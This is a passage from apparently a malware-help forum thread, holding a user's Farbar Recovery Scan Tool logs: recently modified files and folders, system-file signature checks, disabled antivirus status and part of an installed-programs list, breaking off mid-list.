2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-25 13:41 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST2014-08-25 13:40 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI2014-08-25 13:39 - 2014-08-22 13:25 - 00001564 _____ () C:\Windows\setupact.log2014-08-25 13:39 - 2014-07-18 00:39 - 01282029 _____ () C:\Windows\WindowsUpdate.log2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A02014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A02014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt2014-08-25 11:10 - 2014-08-25 10:53 - 00000000 ____D () C:\ComboFix2014-08-25 11:10 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox2014-08-25 11:08 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini2014-08-25 10:50 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat2014-08-25 10:49 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-25 10:49 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-25 10:48 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job2014-08-25 10:47 - 2014-08-22 16:12 - 00040016 _____ () C:\Windows\PFRO.log2014-08-25 10:47 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-08-25 10:46 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-25 09:54 - 2011-03-06 00:06 - 00047104 _____ () C:\Users\savas.kyriakidis\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG20142014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signedC:\Windows\system32\winlogon.exe => File is digitally signedC:\Windows\system32\wininit.exe => File is digitally signedC:\Windows\system32\svchost.exe => File is digitally signedC:\Windows\system32\services.exe => File is digitally signedC:\Windows\system32\User32.dll => File is digitally signedC:\Windows\system32\userinit.exe => File is digitally signedC:\Windows\system32\rpcss.dll => File is digitally signedC:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-08-25 10:57 ==================== End Of Log ============================ Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871154 Share Posted August 25, 2014 Addition Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014Ran by savas.kyriakidis at 2014-08-25 13:41:46Running from F:\Boot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) HiddenAcrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) HiddenActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) HiddenAdobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)AVG 2011 (Version: 10.0.1388 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1390 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1391 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1392 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1410 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1416 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.2109 - AVG Technologies) HiddenBonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)bpd_scan (Version: 3.00.0000 - Hewlett-Packard) HiddenBPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) HiddenBPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) HiddenBrowser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)BufferChm (Version: 120.0.194.000 - Hewlett-Packard) HiddenCatalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) HiddenCCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help English (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help French (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help German (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Italian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Korean (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Polish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Thai (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hiddenccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hiddenccc-utility (Version: 2007.0731.2234.38497 - ATI) HiddenCCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)Destination Component (Version: 110.0.0.0 - Hewlett-Packard) HiddenDeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) HiddenDocMgr (Version: 120.0.000.000 - Hewlett-Packard) HiddenDocProc (Version: 12.0.0.0 - Hewlett-Packard) HiddenEDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )Fax (Version: 120.0.194.000 - Hewlett-Packard) HiddenFeedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) HiddenHP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) HiddenHPSSupply (Version: 120.0.194.000 - Hewlett-Packard) HiddenHTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) HiddenMediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) HiddenMicrosoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) HiddenMicrosoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) HiddenMicrosoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) HiddenMicrosoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 